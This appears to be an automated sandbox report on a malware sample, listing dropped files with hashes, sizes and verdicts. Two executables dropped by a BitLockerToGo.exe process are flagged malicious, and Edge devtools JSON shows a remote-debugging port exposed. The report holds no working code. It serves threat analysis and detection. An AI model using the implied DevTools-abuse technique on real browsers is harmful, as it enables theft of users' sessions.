SSDEEP:768:mMkbJrT8IeQcrQgc9rs2uBhDO6vP6OWeih5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8H89r76xsIahfX7KRoVhu3VlXS
MD5:65C4A617FD037ACE0A82801AE8B8B14F
SHA1:490D48EDFB0E570D1C2FA68B32F4BF7EE099FBB4
SHA-256:FEFE04A589CB1DAF3A0FA23302F00E336F391A1BEAFA201D9DF63B5EF4B0F6F2
SHA-512:06328212F17712BE001D47070AE9070E8612197D48611C6C8998AA91631A3F319B3F2E8A7162B530E0B1C3BE9007DC2D2189449AB701F22A196BD38FF1100D6F
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):44604
Entropy (8bit):6.0965305519764375
Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBwwukhDO6vP6OWeKDXTaJFPm0cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEU67chu3VlXr4CRo1
MD5:DFCA891CCB3089E4FB5BF3BCF3BD469A
SHA1:FD7EA6A40FC1C11968756BFF49BD4D29CE90F610
SHA-256:A7C06659739D9289EA1801A1D9B82B1CC2926F5AD62D8E24C71F36EC601532CA
SHA-512:CD2E0F3959173A6A23EFEC6F88FD854D5737F9C0C24E7839724B2975F397799FCC7F74FA8B5F4DFB1F3E721920C057DCB1390CACD2BDD29048B0575B1576F644
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):2278
Entropy (8bit):3.8470226758576307
Encrypted:false
SSDEEP:48:uiTrlKxrgxWxl9Il8uc7C0EU4LZMhatir7vv/4QSmd1rc:mHYm7C0E8Qirjv/s
MD5:BA7B8B4656BA9AADA6C2A7D002F41A9B
SHA1:B6F7A1BE5C3C1365F2FD4AF5653FF475CBEE2F8F
SHA-256:BA4A3FB3C143D8214331B7737EB44399BC22A7CDF1EC4B33C61C42A582A0DF1C
SHA-512:65FF402AF8CDF1CC1E87B0F8F6E35032863A17FE3B205BDA2AB2C8533D64CA0C1D70B28E73FC3EC51EFD976EEFD4321A0076EC4C181107784390DC23A2627AC5
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4622
Entropy (8bit):4.001976302007193
Encrypted:false
SSDEEP:48:uiTrlKxExuxD9Il8u9P3E0HpqMNHiGYrsLuZWObX1Rx1u5I+p0ln8faEV+2cjkbI:kYz3E0JNrqsLEXvuW+pXayJ+iyZdT
MD5:E65D67351581D588FE00C9B53CB29674
SHA1:AFAC0C6DD0B16454504BE3480124A1212617F608
SHA-256:D6C77CD0D46F42276545F1018677F1F418E81C32B771296D60270618AF877E1D
SHA-512:E1121CEC6EFC0B4E013721B4586416B3F0435BF34A7C3974DA61DB86B0BEDB95C6BAF4D2490CD9FC2F49A5121BA1D29336BCE048363EED10708F8DEBBC79E59C
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):2684
Entropy (8bit):3.8987831264215878
Encrypted:false
SSDEEP:48:uiTrlKx68Wa7xjgxl9Il8u7arBaC0UWlgfZlzDI5W3jOKvvtDM7eH/8Xw+pXRedc:aeY89aC0UisBDIOjOK6aH/8phL
MD5:17E7C462D78B9191394B8CEBE20705D5
SHA1:6C5D84A713F4928A13F9BAE3AECD5378B8369129
SHA-256:EC408E5508A36484306564E162D37AFC61E314469E9700D00DB8E8D07D20400A
SHA-512:F3AB1D798317D12272DB480D7760ABA0CF30103A36849AAE0FE1DF4AAAC99D866BE9E2A92433AA6F1B091E92DA36568CF3F47A5B0448822617C0ECEFB3FBA03A
Malicious:false
Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:JSON data
Category:dropped
Size (bytes):3500
Entropy (8bit):5.395606886907037
Encrypted:false
SSDEEP:96:6NnC6HC9NnC9MtbCKNnCw9CKNnCCvUdgECCwNnCoCmNnCNsvDCN+NnC/8TwCENnp:6NyNLNjNVvULwNxNzxNi8TGN0AOVy
MD5:91AE5006591C5BFF5F4CFAB490E1889D
SHA1:03275DC0CF7BACC4D7751CA6B3E9AB6745E30146
SHA-256:FE81C1B1D275DFE12C01AEE7F7A34F4DBF966AA9CC8A33030E328350AFD0B4F8
SHA-512:B55F8AED0AC76D815C61CEA6B7B183550AFC8BD6CBC6786B19B02340603A4D7FBD3E86D8B3EA3F27BB5B82B238FBBDAE5B344D59C754654D8F9474E92204283D
Malicious:false
Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C7E9E003B4D503B61409CFEF3CCFE2CC",.. "id": "C7E9E003B4D503B61409CFEF3CCFE2CC",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C7E9E003B4D503B61409CFEF3CCFE2CC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5CB81B1CE872E1AAA27477CB72E81747",.. "id": "5CB81B1CE872E1AAA27477CB72E81747",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5CB81B1CE872E1AAA27477CB72E81747"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):11695088
Entropy (8bit):7.8917166271540635
Encrypted:false
SSDEEP:196608:BEbYJP+JnMFs2AhO2uqRJar8hknJnMWT1wbPdLTM5aGeSHNy9Ohcs0aMKgk3LQ1:bJW9MshOXkaIKJnMwYoaVSHasNM4s1
MD5:FBBA09E1B1024A3E7B88D06B53AD3716
SHA1:258FBCDB22474274B21435AA3DA5F95023F363BD
SHA-256:9A58D77F6060DFBF514C5113BBC6381C128D16921B43A808D65BCC2DFDDEC408
SHA-512:DC43D6966A7C6B9E3ECF20703FC154C9400F1A5ED7F6EDD1A8C0D906CD526C184694D98E51DA165F73525095AF38BDCD8DFF1BF383687410068F8840A4CD66F5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):5842928
Entropy (8bit):7.890789729742247
Encrypted:false
SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:JSON data
Category:dropped
Size (bytes):1787
Entropy (8bit):5.3806780796098534
Encrypted:false
SSDEEP:48:SfNaoCMyLTECMtfNaoCkC0fNaoCXu6CXifNaoClIoU0UrU0U8ClQ:6NnClTECwNnCkCgNnCBCaNnClIv0UrUc
MD5:097B36C8C16817ABEA97DAFEB6918727
SHA1:0EC0F60D916E28FD77A85F84571F2B8F02DA0597
SHA-256:CD798687BA7D0DAA7AD5CC58800E7B2F2E3316DD1BA1F46F510D6DFDDFE86CE2
SHA-512:F6423F5FE37DBF832F6AFF95294E13C4C7DE3669BC026C19FC8013FE2467E8B56473E2BCB1FC5C9BF44B3F0BBAF86FDBB4BD987F3B6984DD3BB7160CFD5F91A3
Malicious:false
Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6C67B495C8BF1ADA4E50E4131357A8ED",.. "id": "6C67B495C8BF1ADA4E50E4131357A8ED",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6C67B495C8BF1ADA4E50E4131357A8ED"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/BFC95E20B0E00403472B25984A538B52",.. "id": "BFC95E20B0E00403472B25984A538B52",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/BFC95E20B0E00403472B25984A538B52"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1510207563435464
Encrypted:false
SSDEEP:3:Nlllullkv/tz:NllU+v/
MD5:6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:@...e................................................@..........
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                                        MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                                        SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                                        SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2110
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.402143967570735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrs:8e2Fa116uCntc5toYm+LzM
                                                                                                                                                                                                                                                                                                                                                        MD5:6BCCEE33507C585032A442CBBD4689A6
                                                                                                                                                                                                                                                                                                                                                        SHA1:E382CDEA3F6AE63027A0FCFFD86B348085A12320
                                                                                                                                                                                                                                                                                                                                                        SHA-256:20D4E39792239C5A7FD0D384C94492A084DF1091CE4857A1498C4AF70798B433
                                                                                                                                                                                                                                                                                                                                                        SHA-512:78BA801D1534A7DC40DF997F2E08C920E1F133AF8CED2603408E0A2FF286DCFE7988F5C3DFA86E459D8E4EF57B16F886444E8F732F419C9CD0F6170959F9FDA2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:lLY:2
                                                                                                                                                                                                                                                                                                                                                        MD5:D92901AD94EEEC0DB00FFC7D01C4762F
                                                                                                                                                                                                                                                                                                                                                        SHA1:6A1D130D1C5D5A394C539244959E6B025E7D9519
                                                                                                                                                                                                                                                                                                                                                        SHA-256:00EC65B4A7A23368306F2F2961DB562F7AA152A0D9157D14D7B3230356AA50EA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CBE09C283736B9503B0415B4A6FFBF6ED8E531387132955AB1AC70F37C0E2C3BB0D4B2C20D9194F8E62A779D73641F4E42E2EFDC39DC46577D5A7C5603FD015E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
